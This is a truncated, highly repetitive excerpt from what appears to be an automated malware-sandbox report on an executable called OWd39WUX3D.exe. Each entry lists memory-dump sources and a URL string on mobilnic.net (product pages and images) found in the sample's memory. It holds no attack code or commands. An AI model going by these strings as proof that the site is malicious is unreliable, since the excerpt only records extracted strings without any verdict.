              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=684
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=685
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=686
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=687
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/product/show_product.php?id=717
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/template/default/images/5.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905241912296060.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905280859514872.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905280901053168.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905280901466048.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905280902356680.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/upload/img/201905280903087981.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 